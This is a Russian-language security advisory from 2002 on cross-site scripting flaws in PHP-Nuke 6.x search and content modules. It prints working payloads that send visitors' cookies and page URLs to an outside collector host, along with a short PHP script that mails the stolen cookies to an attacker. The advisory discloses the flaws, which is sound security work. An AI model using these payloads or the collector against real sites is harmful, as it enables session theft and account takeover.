Дата публикации: | 29.11.2002 |
Всего просмотров: | 1476 |
Опасность: | Средняя |
Наличие исправления: | Нет |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | Удаленная |
Воздействие: | Межсайтовый скриптинг |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | PHP-Nuke 6.x |
Описание: | phpNuke – популярная система управления содержанием для UNIX и Windows систем.
Несколько модулей phpNuke содержат серьезную уязвимость, которая позволяет хакеру похищать или отключать учетные записи пользователя, и возможно получать административные привилегии. 1. Уязвимость в поисковом модуле Модуль поиска phpNuke не выполняет никакой фильтрации при возвращении "Результатов для x ... " страницы, и в результате восприимчив к межсайтовому скриптингу, через простой запрос типа: <SCRIPT>location.href="http://www.techie.hopto.org/fetch.php ?email=mattmurphy@kc.rr.com&ref="+document.URL+ "cookie="+document.cookie;2. Уязвимость расширенных тэгов в нескольких модулях phpNuke выполняет фильтрацию большинства опасных тэгов, но не принимает во внимание, что некоторые "безопасные" тэги могут иметь злонамеренные свойства. Уязвимость позволяет внедрять произвольные код сценария в модули PM, дискуссий, новостей и т.п. В основном любой модуль, который принимает пользовательский ввод для статьи, сообщения, или комментария, может быть атакован с HTML типа: <B STYLE="left:expression(eval('location.href= \'http://www.techie.hopto.org/fet ch.php?email=mattmurphy@kc.rr.com&ref= \'+document.URL+\'cookie=\'+document.c ookie'))">Bold text -- or an attack?</B> <B ONCLICK="location.href= 'http://www.techie.hopto.org/fetch.php?email=mattmurp hy@kc.rr.com&ref='+document.URL+'cookie= '+document.cookie">Don't Click</B> <B ONMOUSEOVER="location.href= 'http://www.techie.hopto.org/fetch.php?email=matt murphy@kc.rr.com&ref= '+document.URL+'cookie='+document.cookie">Keep Away!</B>3. Эксплоит:
<?php error_reporting(0); $redir_ref = TRUE; mail($_GET["email"], "phpNuke Cookie", $_GET["cookie"]); if ($redir_ref) { header("Location: ".urlencode($_GET["ref"])); } ?>уязвимость обнаружена в phpNuke 6.5b1 и более ранних версиях. |
Ссылки: | Multiple phpNuke Modules Vulnerable to Cross-Site Scripting |